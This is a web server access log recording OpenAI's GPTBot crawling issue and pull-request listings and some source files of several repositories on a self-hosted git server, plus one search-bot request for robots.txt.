-[17/Feb/2026:19:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 110605] [Gzip 18.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:19:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 18052] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:31:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11347] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" -[17/Feb/2026:19:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11212] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:19:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 27688] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:19:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11772] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 